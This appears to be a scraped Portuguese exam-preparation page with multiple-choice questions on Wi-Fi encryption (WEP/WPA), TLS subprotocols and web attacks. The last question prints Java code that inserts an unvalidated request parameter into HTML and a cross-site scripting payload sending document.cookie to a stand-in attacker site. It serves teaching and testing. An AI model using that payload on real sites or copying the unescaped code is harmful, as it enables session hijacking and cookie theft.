Questões de Concurso
Foram encontradas 417 questões
Resolva questões gratuitamente!
Junte-se a mais de 4 milhões de concurseiros!
Correlacione os protocolos de segurança usados na criptografia de dados de redes sem fio, contidos na coluna I, com suas características listadas na coluna II, numerando corretamente a coluna II de acordo com a I.
COLUNA I
1. WEP-64
2. WEP-128
3. WPA-PSK
4. WPA2-PSK
COLUNA II
( ) Permite o uso simultâneo de dois métodos de criptografia.
( ) Usa criptografia RC4 para confidencialidade e CRC-32 para integridade, com chave de 10 caracteres hexadecimais.
( ) Garante a segurança da conexão pela troca periódica da chave de encriptação, mas não pelo uso de criptografia AES.
( ) Sua chave é composta por 13 caracteres ASCII acrescidos dos 24 bits do vetor de inicialização.
A sequência correta, de cima para baixo, é:
TLS é um protocolo de segurança desenvolvido para oferecer suporte ao transporte confiável de pacotes através, por exemplo, do TCP. Vale-se de dois protocolos, descritos abaixo.
I. Responsável por estabelecer a conexão e negociar os parâmetros da comunicação segura que serão usados como: métodos de compressão, tamanho do hash, algoritmos de criptografia (DES, RC4 etc.) e de integridade (MD5, SHA etc.).
II. Responsável pela aplicação dos parâmetros de segurança negociados. Faz a fragmentação, compactação, criptografia e aplica função de integridade antes do envio das mensagens vindas das camadas superiores.
Os protocolos I e II são, respectivamente,
Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:
(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +
request.getParameter("credit_card") + " '>";
Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:
'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'
Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.
Este é um cenário de ataque do tipo